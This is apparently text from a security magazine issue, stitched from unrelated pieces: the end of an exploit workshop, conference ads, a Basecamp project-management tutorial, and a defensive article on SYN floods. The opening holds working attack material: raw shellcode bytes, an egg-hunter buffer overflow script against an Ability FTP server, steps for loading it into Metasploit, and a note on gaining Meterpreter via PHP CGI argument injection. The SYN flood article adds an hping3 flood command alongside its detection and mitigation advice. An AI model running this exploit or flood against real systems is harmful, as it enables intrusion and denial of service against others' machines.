„\xf4\x2a\x44\x53\x93\x4e\x7a\x74\x67\xc6\x9c\x10\x77”
„\x8e\x37\x8c\xb5\xf5\x8f\x2b\xc5\xdf\xa3\xe4\x51\x57”
„\xaa\x32\x5d\x68\xf8\x11\xf2\xc0\x6b\xe1\x18\xd5\x8a”
„\xf6\x34\x7d\xc4\xcf\xdf\xf7\xb8\x82\x7e\x07\x91\x74”
„\xe2\x9a\x7e\x84\x6d\x87\x28\xd3\x3a\x79\x21\xb1\xd6”
„\x20\x9b\xa7\x2a\xb4\xe4\x63\xf1\x05\xea\x6a\x74\x31”
„\xc8\x7c\x40\xba\x54\x28\x1c\xed\x02\x86\xda\x47\xe5”
„\x70\xb5\x34\xaf\x14\x40\x77\x70\x62\x4d\x52\x06\x8a”
„\xfc\x0b\x5f\xb5\x31\xdc\x57\xce\x2f\x7c\x97\x05\xf4”
„\x8c\xd2\x07\x5d\x05\xbb\xd2\xdf\x48\x3c\x09\x23\x75”
„\xbf\xbb\xdc\x82\xdf\xce\xd9\xcf\x67\x23\x90\x40\x02”
„\x43\x07\x60\x07”
#arranging stack
40
myStage1 = junk1 + egg_hunter
myStage1 += retaddress + „\xEB\xC4”
myStage2 = „w00tw00t” + nops +
buf
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‚192.168.81.140’,21)) # hardcoded IP address of Ability Server running
s.recv(1024)
s.send(‚USER ftp’ + ‚\r\n’) # login with ftp as user
s.recv(1024)
s.send(‚PASS ftp’ +’\r\n’) # authenticate with ftp as password
s.recv(1024)
s.send(‚APPE’ + myStage1 + myStage2 + ‚\r\n’) # evil buffer
s.recv(1024)
s.send(‚QUIT\r\n’)
s.close()
Now, to import this as a module in the Metasploit, we will first fuzz the Ability server with our Python
fuzzer and then use Immunity Debugger to generate Metasploit Exploit code, which we will customize
for our use. Fuzzing steps are shown sequentially in below snapshots in which FTP server was used to fuzz
and then “mona.py” was used to generate the Metasploit Code for us.
41
42
You can find the exploit module in the Immunity Directory and the initial code would be like shown below.
The code would look like this:
43
You should now customize the details that you feel are mandatory as per the vulnerability discovery,
however, you can customize the information section of this module and then import this into the Metasploit
Framework by copying this module in the following directory as shown below. However, name the module
so you can easily find it in the search; in this case, we will name it “ralab_ability.rb”.
Before you add this module into Metasploit Framework, note down the exploits count as shown in the below
snapshot; total exploits in Metasploit available are 1409.
Copy the module you have just created into the following directory as shown in below snapshot.
44
Now run the command on Metasploit console “reload_all”; this will reload all modules and you should
check the exploit number.
You should see the number and it should be one more than the previous total number of exploits; in our case,
it incremented to 1410 as shown below.
45
Now, search for your exploit in the Metasploit Framework, you should search with “ralab” and should be
able to see the exploit available as shown below:
Use this exploit to hack into the Windows machine running Ability server, however, you need to customize
the exploit and add mandatory requirements, like “register” function requirements for adding login/password
option for exploit and setting up buffer space. However, you can use the already customized exploit available
in Metasploit Framework to hack into Windows machine.
Hacking Linux Machine
In Metasploit Framework, we looked for the “PHP CGI Argument Injection Vulnerability” as shown below.
46
We set the target to our Linux Machine on 192.168.81.138 and exploited this bug.
And very easily we got the Meterpreter session.
We hope this has been informative for you and we would like to thank you for completing this workshop.
About the Author
47
May 31 - June 3, 2015
Marriott Resort at Grande Dunes
Myrtle Beach, SC USA
The international meeting place for IT security
professionals in the USA
Since 1998
Register Now at
www.TechnoSecurity.us
with promo code HAK15 for a
20% discount on conference rates!
Comexposium IT & Digital Security and Mobility Trade Shows & Events:
an event by
Basecamp – Project Management for
the Sane
by Troy Hipolito
Download the latest ISO Interactive white paper. There you will find a company description,
capabilities, visuals, development process, case insights, and technology definitions.
• ISO White Paper: www.isointeractive.com/pdf
• ISO Video: www.isointeractive.com/#showreel
• ISO Website: www.isointeractive.com
49
ISO Interactive are award winning consultants that build engaging mobile and web experiences. Known for
small to large opportunities using Unity, Flash, HTML5 and traditional web programming, they have built
very cool virtual worlds, 3D simulations, mobile apps, social games and web designs.
50
Overview
In this tutorial, we will dive into a basic understanding of Basecamp (a project management tool we use), as
well as learn how to get up to speed quickly so that you can start realizing the benefits of the program, among
which are centralizing communications, reducing the frequency of meetings, facilitating team coordination on
projects, and providing transparency on timelines.
We do have more detailed information concerning the project management role and methods that work
best for your orginization in my previous article located at: http://sdjournal.org/download/2011-pentestextra-issues/. Feel free to check it out as there is good information on project management organization
and methods.
Speaking of... Project management is one area we have a lot of experience in. We believe project management
is a major factor in determining success of the project. This is especially true for complex and technical
endeavors.
Now I am not taking away from the great designers and developers, but having these is more of a norm.
Great designers and developers need unification and sometimes direction to keep goals, budgets and
timelines reasonable.
Our groups have worked in corporate as well as the agency scenarios. To be honest, we favor an agency style
as it has more of a startup feel and allows us to get our hands dirty. This allows some control to drive tasks
and better target success.
51
Corporate project management is our view more in reporting to a number of bosses than actual management.
It’s different due to the structure and size of the client/partner.
The good people at 37signals have revamped their popular project management software Basecamp.
Previously we produced a popular project management article for the Software Developer’s Journal that
touches on the old version of the software. More specifically, it is the cover article for the Flash & Flex
magazine in 2011.
So we have actually touched on some of that information but now we will concentrate on an in-depth tutorial
of the new version of Basecamp.
This tutorial is divided into several sections, starting with the basic Why Basecamp?, followed
by a description of the various features and capabilities of Basecamp. The third section will cover
usage instructions and guidelines, from identifying project scope to replying to Basecamp Messages.
The final section covers the conclusion.
Why Basecamp?
You may be wondering, why do we use Basecamp versus another tool?
Well we actually do use other tools depending on the client/partner/requirements. There are many great
online tools out there, for example Jira, MS Project, Asana and RallyDev. Some of these are more feature
rich with true Agile processes while others have very specific set of functions.
At ISO the main focus is to produce a high quality product with the least amount of drama. That may not
sound completely intuitive, but if you think about it, everything is about making things flow and reducing
drama. Controlling costs is actually a byproduct.
The best designers and developers are sometimes a pain in the butt (not all, but most). You know what I’m
talking about: acting like they just hit puberty, not making their deadlines (that they committed to), getting
their feelings hurt easily, whining, crying and all that nonsense. And they have to be managed without them
pooping their pants and walking out of the job because they aren’t doing what they said or aren’t getting
their way. My goodness, it is pain to manage but absolutely needed.
While generally we “try” to adopt more agile processes, we are bound by the rapid changing needs of the
business, which can grow in volume at a rapid pace. Our focus is directed by numerous initiatives that result
in a compound of projects with a pairing of unique groups. Planning projects around Agile-style “sprints”
(i.e., a guaranteed amount of time) is not always possible and more often not probable.
52
Basecamp is often more suitable for many of our needs because it is task-oriented and date-driven. Another
great benefit of Basecamp is it’s an entirely online secure desktop tool. Basecamp also offers a mobile app.
Additional highlights the program offers:
• Centralizing communication for emails based on the project, conversation thread and assigned tasks.
• Uploading and tagging files associated with a particular project. Typically, these are items like word
documents, spreadsheets, images, PSDs and PDFs.
• Setting up and tracking schedules for development, meetings, and handoffs.
The key to success when using Basecamp is for everyone to actually use it for the tasks at hand. Otherwise,
there will not be record of any tasks being worked on. This can easily degenerate into halting progression
to the next step of the project, delays in securing approvals and handing off to other departments, and
failure to meet deadlines. In short, not properly communicating within Basecamp and your project tasks
can jeopardize launch dates.
So think of Basecamp as a handy organization tool that allows the your team to be more efficient and
enhance productivity.
On to our review of Basecamp!
The following are the six (6) main sections found under the Projects Menu in Basecamp:
• Projects
• Calendar
• Everything
• Progress
• Everyone
• Me
Projects Menu
When you log in to Basecamp, you are directed to the main page, where you are able to see all of the
projects available. From here you can select the project you want, change the view of how you want to see
projects, “star” projects that pertain to you, and even create new projects via a template or from scratch.
On this page there is also a little search box that allows you to find things quickly.
53
There are a number of projects in the queue at any given time. To find a particular project simply, scroll
up or down until find what you need. You’ll also have the option to change the view from “graphical” to
“hybrid” to “textual” by using the icons on the left of the screen (below the New Project link). If you like
to read through the list quickly you may want to use the “textual” view.
If you want to group the projects which are specifically assigned to you, simply click on the “star” for those
projects and they will all be moved up together to the top.
Additionally, if you want to look for a project that you know is finished but can’t find the name, click the
archived projects link on the top right to see a listing of those projects.
Individual Project “Project Name”
Each project has a number of components. Clicking on a project, you will notice menu links/sub sections
for Project Landing Page, Discussions, To-dos, Files, Text Documents and Events.
Project Landing Page
The title of the project is the link to the project landing page. These pages are useful for viewing recent
activity on the other subsections. From top to bottom it has the Latest project updates, Discussions, To-do
lists, a visual of the Files uploaded and newest Text Documents.
All content from these subsections displayed on the project landing page link directly to those details.
Next, let’s take a look at the definition of most of these titles.
54
Discussions
Discussions serves as a type of “centralized” email inbox. Typically Discussions are not directly tied to to-dos.
These are used for emails which may deal with internal approvals and general notes that may or may not
pertain to current tasks. Each discussion can have its own thread. For example, “discussions” can be used to
post project notes.
Starting a Discussion
To start a discussion, log in to your Basecamp project, click on the post a new message button. There you have
the Subject line and the message area. You can format with the tools available and if needed upload a file.
Make sure you DO NOT email everyone. No one likes spam. Please only click on the individuals that need
to know. There is more on this and other etiquette items in the How We Use Basecamp section.
55
Once they receive a Basecamp message, individuals can simply email back from their native email client
or click the “view on Basecamp” link within the email to reply. Viewing from Basecamp will allow the entire
conversation thread to be reviewed. Lastly, you can attach files as needed in discussions.
To-do lists
To-dos are a vital part of Basecamp. It is what generates the Calendar and assigns tasks to individuals and
denotes important events. It is basically an adjustable task list with due dates.
Within the following image there is an Add a to-do list button, title of a current To-do list and individual
to-dos/tasks. And on the right side there are the view options (show assigned to, show when is due, show
completed, and individual to-do lists).
Basecamp allows for numerous lists. Typically, depending on the type and size of the project, you may want
to break it up. At this time, however, our projects are fairly small, so we would we prefer a more linear
approach. It is simpler for our current needs.
56
The previous image displays individual to-dos that can have a few pieces of additional information.
Normally it has a description, due date and the person the task is assigned to. If there are any comments
relating to this to-do task, you will see a note following the to-do task description.
Once the to-do task is completed, the assigned person or Project Manager can check it off (with the check button).
In order to view a comment, just click on it. Comments are very good if the short description does not have
enough detail.
However, for our projects we add some additional info. In each of our to-do items we have the subject
(e.g Comps), short description, percentage complete, date or date range, separate due date and person the
task is assigned to.
In the example below, the original description was reduced to UX > set 1. In this case, we added comments
for further clarification.
Selecting on a to-do task (that has comments) will display all the comments in a thread fashion. This is very
similar to how the message conversations are done. The viewer will also be able to select to whom to email the
message. The purpose is to have the person assigned to be responsive regarding the progress of their task and
to centralize related conversations. Only conversations that pertain to this to-do task should be added here.
There is also an option to email people outside of Basecamp who are not part of the project. However, that is
not recommended for our production flow.
Once individuals receive a message, they can simply reply via their email client or from Basecamp.
It is usually better to email back via Basecamp if you feel that you want to read part or the entire thread.
57
Going back to the additional info we added, let’s talk about the percentage item (e.g. [30%]). This info can
be added manually in Basecamp by the person performing the task, as well as the project manager. This is
done by moving your cursor over the to-do task and then selecting the “edit” option.
This allows everyone to quickly see how much of the task is considered completed. Formatting it this way
also has some major advantages. That piece of information, along with the due date, is pulled in a visual
Gantt chart/timeline called TeamGantt..
Gantt Chart
This is separate online software that is very useful for visual teams. And the project manager can invite
the same people on the project from Basecamp to TeamGantt.
58
TeamGantt uses the percentage info provided to show completion of the task. The beginning and end dates
in the to-do task description are just a reference so we can visually adjust the timeline. But adding the time
range in the textual format makes it is easy to read and that is the important thing.
TeamGantt also has some neat printing features, associating tasks with each other and even color coding
groups of tasks.
As such, if designing comps are dependent on wireframes, you can link them together visually. In this case,
I have made all the comp related items a fuchsia, or “hot pink” color. So all the comp driven tasks are one
color, UX-related another color, and so on.
A couple of other neat features allow the Project Managers or individuals with edit permissions to send notes
to the tasks from both Basecamp and TeamGantt. It is just a little option that helps get things done quickly.
59
Calendar
For the most part the Calendar is pretty self-explanatory. There are some automatic things it provides, as well
as features that can be used. Below is a screenshot.
To the left of the screenshot, the Calendar shows all the events relating to the projects you are involved with.
Be aware that the complete view is on by default, and it may become too much information unless you turn
off projects you are not focusing on.
If that is the case, just click the little colored circle with the check mark in order to turn the visibility
(on or off) of the related tasks from the calendar. What you see in the larger portion of the calendar are all
the to-dos posted by due dates. A user can also use this to checkoff work. Besides the normal To-do items,
individuals can also add their own entries and associate them to any accessible project. These, however,
do not create a to-do item but, rather, only create a calendar event. Our group uses Google Calendar, so we
may not use this as often. However it may be useful to add events if it helps to keep track of events on an
individual bases. The following image shows how to create an event. You can add an event by clicking
on any of the calendar days. You can add the event’s title and additional notes to the desired calendar,
and you can even adjust the event to span over multiple days if needed and then email your colleagues.
60
Everything
“Everything” is an easy way to browse all items in their respective groups. This section has Browse every
discussion, Review all open to-dos, See every single file, Read all text documents, Show all forwarded emails
and See all deleted items.
These are just other ways to find information quickly.
61
To provide a quick breakdown:
• Browse every discussion > Provides a listing of any/all textual updates in the order they were added.
You can click to get to that discussion and associated project by selecting it.
• Review all open to-dos > Provides access to all the to-dos (that you have access to) that have not been
checked off. Again, you can just link to the exact to-do within the project by clicking on any of the items
on the page.
62
• See every single file > Provides access to all uploaded files for all the projects to which you have access to.
Useful if you have a lot of projects and you want to have an overview of all uploaded files, etc.
• Read all text documents > Shows all documents based on the last update.
• Show all forwarded emails > For emails that have responses from outside of Basecamp. We probably
will not have a need for this.
• See all deleted items > Anything that has been deleted. This is also not used very often.
Progress
Shows who did what in the order it happened. This comes in very handy when wanting to find out any
activity of the last few days. Beyond that it may present too much info. The Progress section also gives
a good indication on who is using Basecamp and how.
You can scroll down, review the messages, files and happenings in real time.
Everyone
This section shows everyone based on the last active individuals. Latest active individuals are posted first.
You can see everyone by clicking the “See all people” link on the bottom left of the screen.
Incidentally, “admins” can add additional people, change access permissions and perform other
administrative functions.
63
Me
The “Me” section can be very helpful to quickly see everything on your plate. Provides access to all the latest
activity across all your projects, all your open to-dos, recently completed todos and files you have shared.
This should actually be the first place you should go in the morning to see if it lines up with what you know
needs to happen.
64
How We Use Basecamp (Usage Guidelines)
This is so important we made it a major section in the article. Proper etiquette comes into play when we
think of how our actions affect the team and timelines. Basecamp is pretty much an open system. We can
use it the way we like. We as a group need to form and follow a sort of protocol or “etiquette” which will
be helpful in making everything to start making sense and become more of a natural process.
This process should include “when” and “how” we use Basecamp communications, as well as where
information should be located. Basecamp is not a perfect tool by far. It is up to everyone to use and tweak it
as needed. At the same time, if we do not report to it, then the information will not be available for everyone
else. An added advantage of properly and effectively using the system is that it will actually help reduce the
need for some of the meetings and allow you to complete your work.
The rules of today maybe switched later for something that makes more sense. But for now these are
the general usage guidelines.
Identifying Your Tasks
Tasks can be anything including replying to messages, reviewing documents, identifying dates and, yes,
especially to-dos.
One of the things we have to keep in mind is to look out for each other. If you notice that there are tasks
missing that will prevent you from doing your work (or dates that do not seem appropriate) then please
let everyone else know. It probably has to be addressed.
65
So, where do we start?
• First go to the “Me” menu link. There you can see what tasks are assigned to you.
This does not give you a clear priority but it does show you all things you are associated with.
If you know there are tasks or projects that you have to do work on and it is not there, find out why.
If it is not on Basecamp then others may not know it exists. Basecamp should be used as transparently
as possible so others can quickly see how the project is going without the need for much interaction.
Basecamp is designed to show you and others where you are at in the process of your projects.
• Secondly (and this is optional): START POINT project is a good place to go to, as there is a to-do list
called Priorities. There you can find your name and make notes on your goals for the day in order of
importance. Creating this priority list helps you focus on items needed. And we all know the focus
can change at any moment. So feel free to update that to-do item for any updates.
• Once you are focused for the day, it is best to dive in the individual project you are working on.
Based on the priority list you have created, then go the project you have to work on.
Identifying project scope and important files and links
Even after you have reviewed the project and your to-do’s, do not overlook the possibility that there are
times when there may be context missing on the project or you may need access to some particular bit of
additional information. This could be a reference info, a “what the heck is this project about,” a list of who
is on it, or information on how to get access to the needed file(s).
It may just be that you need more details on the actual to-do/task...
Formatting explanation of the to-dos schedule
To make the to-dos a little more precise and at the same time keep the amount of content readable for the todos, we have implemented a subject formatting technique to assist in this matter.
As we mentioned before, the to-dos are tasks that can be also arranged as a schedule (view section 1.3
for general details on to-do’s). This subsection, however, is really designed to break down why we format
it the way we do.
Please note that not all to-do items may be formatted this way. However, if you have a series of tasks that
form a schedule, then it is best to use these practices. To simplify the different styles let’s call these series
of tasks (to-do schedules) and non-series of tasks (one-offs or similar tasks).
To illustrate the point the images that follow are 2 different views of the same series of tasks. The first image
is what you see from Basecamp, while the second is a more visual timeline generated in TeamGantt.
Series of tasks
Basecamp view. Most projects that require a series of tasks are broken up in usable chunks. They tend to
include most of the larger events, but often meetings spring up for additional reviews or issues that are not
related to the project.
You can see this project is a little more complicated than most, but the basic structure is pretty standard.
Typically, most projects have:
• BO (Business Owner) ZIP and CB (Creative Brief). In the example below it was already completed
and checked off.
• Internal kick-off. Again, this already happened and has been checked off.
66
• UX development
• Content support
• Comps
• Internal reviews (some times these are not listed as the dates shift too often)
• Legal reviews
• IT Release
• UAT prep
• IT Dev
• UAT internal testing
• Launch
As you will notice, the following image has multiple releases. Sometimes this is needed if you are dividing
design and development/IT groups. Dev/IT may have to get started on a project overlapping the design
schedule in order to make launch dates.
67
Now that we have an idea of the different groupings, let’s consider formatting. If you take another look at the
series of tasks shown above, you will notice that some have “++” in front of them and others do not.
• The “++” prefix generally represents a release or major meeting. These are what we call non-tasks
or things that do not require the online group to develop.
Items without the “++” prefix generally represent design of UX, content creation or comp designing.
• You will also notice that we use the overarching subject first. So you may read things like UX, Content
or Comps. Then you will notice a little arrow like this “>”. After that a small amount of detail (just
enough to understand what is being worked on).
• After the detail you will often see a date or date range. For events that take one day, a simple date is
needed, while for events spanning a period of time it is good to just put the date in the description. This is
important because Basecamp only tracks end dates. We want to show the start and end dates.
• After the date or date range you may see a percentage in brackets like this – [50%]. This is manually filled
out so we get an idea on where this task is in the process. It is also auto-translated visually in the Gantt chart
in TeamGantt. And if the description is a bit vague, that is why you add a comment to it. That way anyone
looking at this particular to-do can see that there is a comment which can be clicked on to drill down and
see additional details.
• Then the task is assigned to someone and given a due date. You may be curious why there is a date range
and a due date. For starters, while due dates are tracked in the system, we format these dates visually
to make it easier to read and identify start dates.
Also TeamGantt has start dates as well as end dates. It is easier to adjust the start in TeamGantt once you
can actually read the date ranges in the description.
So let’s use this example and break it down.
Comps > set 1 > see comments > 8/12 – 8/15 [0%] 1 comment Person Name Mon Aug 11
•
Comps
= Overall subject.
•
set 1
= Short detail.
•
see comments
•
8/12 – 8/15
•
[0%]
•
1 comment
•
Person Name Mon Aug 11
= A note signifying that more details on the tasks are to found in the comments.
= Start and end date (note we will probably have several internal approval meetings in between
these dates that may or may not be notated on the schedule).
= The estimated percentage of the task completion.
= Shows how many comments are associated with this task.
= Who is assigned (and defaults emails to), and when is that task due.
68
TeamGantt project is just pulling the Basecamp information, providing a visual reference of the time it takes
to complete a task (start and end date), a visual percentage of completion, and some of the same tools that
Basecamp has.
To simplify, the Project Managers generally set up the permissions for TeamGantt to be “view only.” This
is so individuals do not have to try to adjust things from there. But the Project Managers do have the ability
to create messages and tasks from there if they choose (or need) to.
The Project Managers also try to color-code 4 different types of tasks: Non-tasks (the ones with the “++”
prefix): a default powder blue:
• UX: light orange
• Content: orange-red
• Comps: a hot pink/fuchsia color.
In the previous graphic you will notice that a few UX tasks are 95% done. The timeline items for that tasks is
actually 95% full. This is a visual indicator of where the task is.
Non series set of tasks
The following image is example of a non series set of tasks. These are things like one-offs or recurring tasks.
69
The non-series of tasks are usually simple, yet explain things when possible in the subject first type of
formatting.
When to use regular email vs. Basecamp messages/to-dos
There are lots of messages that do not have to be tracked or which don’t specifically pertain to a task. If this
is the case, you don’t have to use Basecamp. You will have to decide if you want the message to be seen by
others or not.
We try to streamline whenever possible but also communicate enough to complete the tasks and “asks” at hand.
These are some examples of what not to post on Basecamp. “Hi John – how was your weekend?”, “I did
not like the meeting and thought it was a bad idea” or “I am concerned I committed to a deadline I can not
reach.” These are examples of messages or personal conversations that should handled outside of Basecamp.
Also if we are emailing other people outside of Basecamp, we should just use an email. They will not know
what the email is if it coming from the Basecamp system.
Replying to Basecamp messages/to-dos
One obstacle we tend to run across is that we do not always have an understanding that a Basecampgenerated email is an email that requests a reply. If emails are not acknowledged then it can have an adverse
effect when trying to finish projects in a timely manner. As such:
70
• Always direct the email to the main person when applicable.
For example: If you are sending out a message and have selected several individuals to receive it, please
direct the message to the individuals by adding @ symbol followed by the persons’ names. It will end up
looking something like this: @Jon.
That way once they receive the email the first thing they will see is who the email focused on.
• Please reply to Basecamp emails.
• Please start conversations on to-dos and messages on Basecamp (when appropriate).
More information about general usage of Basecamp messages and to-dos please view sections 2.2 and 2.3.
Conclusion
Basecamp is a tool to allow us to centralize conversations, help build and maintain task-driven timelines.
It can also be integrated with a number of other tools like TeamGantt, which allows us to visually see the
timelines (beginning to end), percentage of items completed, certain print features and just allows the online
group to quickly stay on track.
Although Basecamp is a great tool to have, it only works well when people are consciously using it in
a productive manner. This is a flexible system that requires a little manual work to keep things running
smoothly. Just remember, you can also take a peek at the online help section where there are guides, videos
and cheat sheets at: https://basecamp.com/help.
I hope this article gives you the basics to help get projects done a little more efficiently and with more peace of
mind. Having a sense of control and being able to confidently get things done and report positively to the client
definitely makes your life easier. I like easy (Freudian slip).
There are of course more advanced tools but we have chosen Basecamp and related online applications
because they are flexible enough for the projects we are working with, while easy enough for clients to
respond to. All things are centralized and documented automatically in one place. And if the client responds,
then you have a direction you can move towards to make it closer to finishing the goals of the job.
If anyone is interested in the work we have done please take a gander at our site http://www.isointeractive.com
as we have at least some of our public projects posted there. Mostly we deal with helping clients and partners
fixing or developing mobile apps, websites, software reviews/audits, games, 3D simulations, lots of specialty
projects and good old web development. Typically they range from the range of 10k to under a million USD.
A few links of interest:
• ISO White Paper: www.isointeractive.com/pdf
• ISO Video: www.isointeractive.com/#showreel
• ISO Website: www.isointeractive.com
Thank you and we look forward to continue contributing to the interactive community.
If you have any needs or even just want to brainstorm, please feel free to connect.
• email: [email protected]
• skype: troyhipolito
• web: isointeractive.com
71
• facebook: facebook.com/ISOinteractive
• twitter: @isointeractive
• instagram: iso_interactive
About the Author
Troy Hipolito is the Senior Consultant at ISO Interactive (a consulting social and mobile game company
that supports agencies for campaigns, Facebook games, iPhone Apps and that sort of thing).
72
InterDrone is Three Awesome Conferences:
For Builders
More than 35 classes,
tutorials and panels for
hardware and embedded
engineers, designers and
software developers building
commercial drones and the
software that controls them.
For Flyers and Buyers
More than 35 tutorials and
classes on drone operations,
flying tips and tricks, range,
navigation, payloads, stability,
avoiding crashes, power,
environmental considerations,
which drone is for you, and more!
Meet with 80+ exhibitors!
Demos! Panels! Keynotes!
The Zipline!
For Business Owners,
Entrepreneurs & Dealers
Classes will focus on running a drone
business, the latest FAA requirements
and restrictions, supporting and
educating drone buyers, marketing
drone services, and where the next
hot opportunities are likely to be!
September 9-10-11, 2015
Rio, Las Vegas
www.InterDrone.com
A BZ Media Event
Tackling SYN Flood attacks
by Ratan Jyoti
TCP SYN flooding attack is a type of Denial of Service attack where many bogus TCP SYN
Packets are originated. During the normal three way handshake between client and server
the client first sets off the connection with a TCP SYN packet, which is responded to with
a SYN/ACK packet by the intended server and at last the client replies back with an ACK
packet to establish the connection.
Figure 1. A normal three way TCP Handshake
In a TCP SYN flood attack, the malicious client begins a three way handshake which the client never
finishes. The client only sends TCP SYN packets and no final ACK packets, and by virtue of which the
server reserves memory slots for each incomplete connection. By this process, the server’s memory gets
filled with increasing incomplete connections until the server can no longer no longer accept the other
incoming requests (both genuine and malicious) in want of free memory. The goal of this simple technique
is to deny the TCP services to the legitimate clients by creating a large number of half open TCP connections
that fill the host’s listen queue. Usually, these TCP SYN packets use counterfeit IP addresses to prevent
detection and because of these nonexistent IP addresses, no responses are returned to the server.
Figure 2. TCP SYN Flood Attack
74
A sample SYN Flood induction in Linux by hping3
Hping3 is a tool developed by [email protected] which can send custom arbitrary TCP/IP packets to network
hosts. Hping3 is a multipurpose tool which can be used to perform the following, among other things:
• Testing firewall rules
• Port scanning (basic and advanced)
• Testing network performance
• Trace routing
• Remote OS fingerprinting
• TCP/IP stacks auditingThis tool can be used to induce SYN Flooding. A sample SYN Flood attack input
and output are demonstrated below:
Input:
$ sudo hping3 -i u2 -S -p XX -c N
IP_Address
HPING IP_Address (eth0 IP_Address): S set, 40 headers + 0 data bytes
Output:
--- IP_Address hping statistic --N packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The above input command would send TCP SYN packets to IP_Address mentioned. Hping3 creates raw
packet for which root privileges are used and hence sudo is required. Here
S
– indicates SYN flag
p XX
– denotes Target port XX
i u2
– tells Wait for 2 micro second between each packet
c
– Indicates the number of packets to send/receive for sending N number of packets
hping3 works in multiple modes which are:
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
How to determine if a particular server is under a SYN Flood
attack
Netstat in Linux is a simple tool by which it can be determined if the server is under a SYN Flood attack or
not. Let us consider a server which can handle ten thousand user requests per second.
75
Table 1. SYN Flood Attack analysis
Input
netstat -nap | grep SYN | wc -l
Output
<1000
>1000 and <5000
>5000
Possible SYN Flood attack status
SYN Flood attack less likely
Possible SYN Flood attack
SYN Flood attack
Anything more than 2000 user requests per second is abnormal and denotes a possible SYN Flood situation.
A user request of a few hundred per second depicts the normal situation.
Ways to prevent/defend SYN Flood attack
Filtering based on IP address
Ingress IP filtering at the peripheral devices, such as the router, will decrease the chances of IP spoofing
which can induce SYN Flood or similar attack. For example, the following ingress filter will be effective to
tackle a SYN Flood attack:
Listing 3. A simple logic for filtering IP addresses
IF
request source IP is within X.X.X.0/N
THEN allow the request.
IF
THEN
request source IP is anything else
deny the request
A careful IP range needs to be configured based on trust levels. Deployment of filter devices and their
position in the network is the key. It may be difficult to stop. The drawback can be the malicious attacker
who uses compromised legitimate IP addresses and changes these legitimate sources frequently. Such
systems may be difficult to be tackled by this IP Filtering.
Increasing Transmission Control Block Backlog queue
Each connection is different and thus the TCP uses a special data structure called a Transmission Control
Block (TCB) to maintain all the vital information about any connection. The devices maintain their own
TCB for the connection individually. As soon as a connection starts, the respective TCB will hold all special
information about it.
Each connection can handle the memory based on TCB and its implementation. The TCP SYN-RECEIVED
is a half open condition and the TCB is allocated as per the receipt of the SYN packet. In a SYN Flood
scenario, the complete backlog of TCBs is used for SYN-received state and SYN-ACKs sent to the
attacker’s designed fake endpoints and thus there remains no room for new TCBs to be put into new SYNRECEIVED, and because of which all incoming SYNs can not be treated.
Increasing the backlog can tackle SYN Flood attack to some extent. However, increasing the backlog by too
much can have a performance issue as will.
76
Listing 1. Increasing Backlog – net/core/request_sock.c
……..
int sysctl_max_syn_backlog = 1024;
EXPORT_SYMBOL(sysctl_max_syn_backlog);
int reqsk_queue_alloc(struct request_sock_queue *queue,
unsigned int nr_table_entries)
{
size_t lopt_size = sizeof(struct listen_sock);
struct listen_sock *lopt;
nr_table_entries = min_t(u32, nr_table_entries, sysctl_max_syn_backlog);
nr_table_entries = max_t(u32, nr_table_entries, 8);
nr_table_entries = roundup_pow_of_two(nr_table_entries + 1);
lopt_size += nr_table_entries * sizeof(struct request_sock *);
if (lopt_size > PAGE_SIZE)
lopt = vzalloc(lopt_size);
else
lopt = kzalloc(lopt_size, GFP_KERNEL);
if (lopt == NULL)
return -ENOMEM;
for (lopt->max_qlen_log = 3;
(1 << lopt->max_qlen_log) < nr_table_entries;
lopt->max_qlen_log++);
Source: request_sock.c by Arnaldo Carvalho de Melo
One SYN_RECV socket may cost approximately 80 bytes in a 32-bit system. The minimum value is 128
for low memory machines. Experiments with real servers show that it is very low as it would be difficult to
manage even 100 requests per second. A minimum of 1024 is recommended. However, the actual number
depends on expected number of requests per second. A high memory machine may handle more user
requests per second.
Decreasing SYN-RECEIVED state timeout
Decreasing SYN-RECEIVED state timeout value will decrease the time a half-open connection will occupy
the backlog queue, therefore the duration of SYN Flood will reduce. However, a value of timeout that is too
small may abort even legitimate requests. In the case of a SYN Flood, the attacked server never recognizes
the bogus requests. However, at the gateway level, these requests will be discarded and the SYN Flood
situation can be tackled. In the new generation firewalls the semi-transparent gateway mechanism helps to
tackle SYN Flood by artificially completing 3 way handshake and completing the 3 way handshake in a
secure manner.
For example, tcp_synack_retries settings in some Linux versions tells the kernel the number of times the
SYN,ACK can be transmitted in response to SYN, which helps in dealing with the SYN Flood.
77
Listing 2. An ipv4 sysctl.conf
…….
net.ipv4.tcp_fin_timeout = X
net.ipv4.tcp_max_orphans = X
net.ipv4.tcp_max_syn_backlog = X
net.ipv4.tcp_max_syn_backlog = X
net.ipv4.tcp_rmem = 4096 87380 X
net.ipv4.tcp_sack = X
net.ipv4.tcp_syn_retries = X
net.ipv4.tcp_synack_retries = x
net.ipv4.tcp_syncookies = X
net.ipv4.tcp_timestamps = X
net.ipv4.tcp_tw_recycle = X
net.ipv4.tcp_wmem = X
A careful setting of tcp_synack_retries may give the desired results in handling SYN Flood.
SYN Cache implementation – replacing per socket linear chain of unfinished queued requests with a global
hash table.
The SYN Caching implementation typically helps by limiting the number of entries in the following manner:
• By putting an upper limit on the memory that the SYN cache use
• By putting an upper limit which a device requires for searching for a matching entry and replacing cache
entries
SYN Cache settings can be checked in the following manner and edited for optimum performance.
Table 2. SYN Cache setting in /boot/loader.conf
Input
Output
sysctl -a | grep syncache
net.inet.tcp.syncache.rexmtlimit: X
net.inet.tcp.syncache.hashsize: X
net.inet.tcp.syncache.count: X
net.inet.tcp.syncache.cachelimit: X
net.inet.tcp.syncache.bucketlimit: X
This implementation is special due to the usage of secret bits which prevents an attacker from targeting hash
values in order to breach the bucket limit, and it relates to CPU time and memory. The bucket limit is set for
each hash value; upon reaching the limit, the oldest entry is released.
SYN Cookies
SYN Cookies are a stateless SYN proxy mechanism. This is so because this assigns no state to connections
in SYN-RECEIVED. Here states are normally kept in the sequence number sent on the SYN-ACK. A
legitimate request can thus only can do a handshake where bogus requests will fail because of the state in the
TCB. If the client sends a subsequent ACK response, the server can reconstruct the SYN queue using details
programmed in the TCP sequence. The tcp_syncookies can be enabled in the following manner:
78
Table 3. SYN Cookies setting in /etc/sysctl.conf
Step
1
2
3
Activity
Edit the file /etc/sysctl.conf
Append the following
Save the changes
Output
vi /etc/sysctl.conf
net.ipv4.tcp_syncookies = 1
sysctl -p
Other approaches
